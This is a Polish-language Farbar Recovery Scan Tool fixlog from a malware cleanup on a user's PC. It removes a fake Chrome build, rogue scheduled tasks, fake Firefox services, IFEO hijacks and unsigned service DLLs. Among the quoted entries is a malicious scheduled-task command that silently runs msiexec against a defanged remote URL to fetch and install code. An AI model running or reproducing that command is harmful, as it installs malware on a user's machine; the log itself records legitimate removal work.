Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 05-06-2017 Uruchomiony przez ThinkPad (06-06-2017 02:18:11) Run:1 Uruchomiony z C:\Users\ThinkPad\Desktop Załadowane profile: ThinkPad (Dostępne profile: ThinkPad) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-140913146-4283183929-3759989110-1000\...\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.) <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Footjane RemoveDirectory: C:\Users\Oli\AppData\Local\Footjane RemoveDirectory: C:\Users\Oli\AppData\Roaming\Footjane Task: {BA878794-B41C-47F6-A09A-F53A4B842565} - System32\Tasks\Voqeysocis Schedule => C:\Program Files (x86)\Werkas\pihadom.exe Task: {E1B18D9A-CE9A-4FF9-A12C-0DE6209CFF5B} - System32\Tasks\Microsoft\Windows\DeviceSettings\Reogent => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD2500BEKT-75A25T0_WD-WXQ1A80R9996R9996&d=20170510 /q <==== UWAGA Task: {E818543E-DC05-4EBF-9B13-6AC5CEFD1A6F} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-18] () <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Werkas RemoveDirectory: C:\Program Files (x86)\MIO C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{AC0D3C9C-52FD-43D8-B252-4C1C2ED2FD47}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe FirewallRules: [TCP Query User{8D36DB04-EE8F-4931-868A-1DCE319AE25D}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe] => (Block) C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe FirewallRules: [UDP Query User{E71CB1E7-6B13-4A28-9745-0DBF238B1716}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe] => (Block) C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe FirewallRules: [{1B4F49D9-8FFB-457B-BCEA-FD7F729DBB71}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd2500bekt-75a25t0_wd-wxq1a80r9996r9996.dat FirewallRules: [{984613D8-4B99-469A-9A9F-778CE2FAE2C4}] => (Allow) C:\Program Files (x86)\MIO\loader\wdcxwd2500bekt-75a25t0_wd-wxq1a80r9996r9996.dat FirewallRules: [{598155CE-D4A6-44FF-B0BB-B6884462442E}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{44D4CAF7-DB39-4716-9636-D1D9379B9EDB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\ThinkPad\AppData\Local\Firefox RemoveDirectory: C:\Users\ThinkPad\AppData\Roaming\Firefox HKLM\...\Providers\i7w852aa: C:\Program Files (x86)\Voqeysocis Schedule\local64spl.dll [311808 2017-05-10] () IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {0A347CC0-316E-11E7-8DD3-64006A5CFC23} - C:\Users\ThinkPad\AppData\Roaming\Grohation\Sopishroqpy.dll -> Brak pliku ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku C:\Program Files (x86)\Voqeysocis Schedule C:\Users\ThinkPad\AppData\Roaming\Grohation R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-15] (BIT) [Brak podpisu cyfrowego] <==== UWAGA S2 CSHMDR; C:\Users\ThinkPad\AppData\Local\CSHMDR\Snare.dll [832000 2017-05-18] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-19] () <==== UWAGA R2 WinSAPSvc; C:\Users\ThinkPad\AppData\Roaming\WinSAPSvc\WinSAP.dll [1873920 2017-05-18] (TODO: ) [Brak podpisu cyfrowego] <==== UWAGA U3 uxlyrkog; \??\C:\Users\ThinkPad\AppData\Local\Temp\uxlyrkog.sys [X] <==== UWAGA C:\ProgramData\BIT C:\Users\ThinkPad\AppData\Local\CSHMDR C:\Users\ThinkPad\AppData\Roaming\WinSAPSvc C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-140913146-4283183929-3759989110-1000_Classes\ChromeHTML => klucz pomyślnie usunięto "C:\Program Files (x86)\Footjane" => pomyślnie usunięto. "C:\Users\Oli\AppData\Local\Footjane" => nie znaleziono. "C:\Users\Oli\AppData\Roaming\Footjane" => nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BA878794-B41C-47F6-A09A-F53A4B842565} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA878794-B41C-47F6-A09A-F53A4B842565} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Voqeysocis Schedule => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Voqeysocis Schedule => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E1B18D9A-CE9A-4FF9-A12C-0DE6209CFF5B} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1B18D9A-CE9A-4FF9-A12C-0DE6209CFF5B} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Microsoft\Windows\DeviceSettings\Reogent => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Reogent => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E818543E-DC05-4EBF-9B13-6AC5CEFD1A6F} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E818543E-DC05-4EBF-9B13-6AC5CEFD1A6F} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Milimili => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz pomyślnie usunięto "C:\Program Files (x86)\Werkas" => pomyślnie usunięto. "C:\Program Files (x86)\MIO" => pomyślnie usunięto. C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{AC0D3C9C-52FD-43D8-B252-4C1C2ED2FD47} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{8D36DB04-EE8F-4931-868A-1DCE319AE25D}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{E71CB1E7-6B13-4A28-9745-0DBF238B1716}C:\users\thinkpad\appdata\local\hola\firefox\app\hola_plugin.exe => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1B4F49D9-8FFB-457B-BCEA-FD7F729DBB71} => Wartość nie znaleziono. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{984613D8-4B99-469A-9A9F-778CE2FAE2C4} => Wartość nie znaleziono. HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{598155CE-D4A6-44FF-B0BB-B6884462442E} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{44D4CAF7-DB39-4716-9636-D1D9379B9EDB} => Wartość pomyślnie usunięto "C:\Program Files (x86)\Firefox" => pomyślnie usunięto. "C:\Users\ThinkPad\AppData\Local\Firefox" => pomyślnie usunięto. "C:\Users\ThinkPad\AppData\Roaming\Firefox" => pomyślnie usunięto. HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\i7w852aa => klucz pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order i7w852aa => pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{0A347CC0-316E-11E7-8DD3-64006A5CFC23} => Wartość pomyślnie usunięto HKCR\CLSID\{0A347CC0-316E-11E7-8DD3-64006A5CFC23} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. C:\Program Files (x86)\Voqeysocis Schedule => pomyślnie przeniesiono "C:\Users\ThinkPad\AppData\Roaming\Grohation" => nie znaleziono. BIT => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\BIT => klucz pomyślnie usunięto BIT => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\CSHMDR => klucz pomyślnie usunięto CSHMDR => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto WinSAPSvc => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\WinSAPSvc => klucz pomyślnie usunięto WinSAPSvc => serwis pomyślnie usunięto uxlyrkog => serwis nie znaleziono. C:\ProgramData\BIT => pomyślnie przeniesiono C:\Users\ThinkPad\AppData\Local\CSHMDR => pomyślnie przeniesiono C:\Users\ThinkPad\AppData\Roaming\WinSAPSvc => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\ThinkPad\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk => pomyślnie przeniesiono =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 61592688 B Java, Flash, Steam htmlcache => 57858 B Windows/system/drivers => 2674081701 B Edge => 0 B Chrome => 0 B Firefox => 460330604 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 2190 B Public => 0 B ProgramData => 0 B systemprofile => 16674 B systemprofile32 => 43892709 B LocalService => 0 B NetworkService => -944 B ThinkPad => 6592593581 B RecycleBin => 11649601 B EmptyTemp: => 9.2 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 02:23:23 ====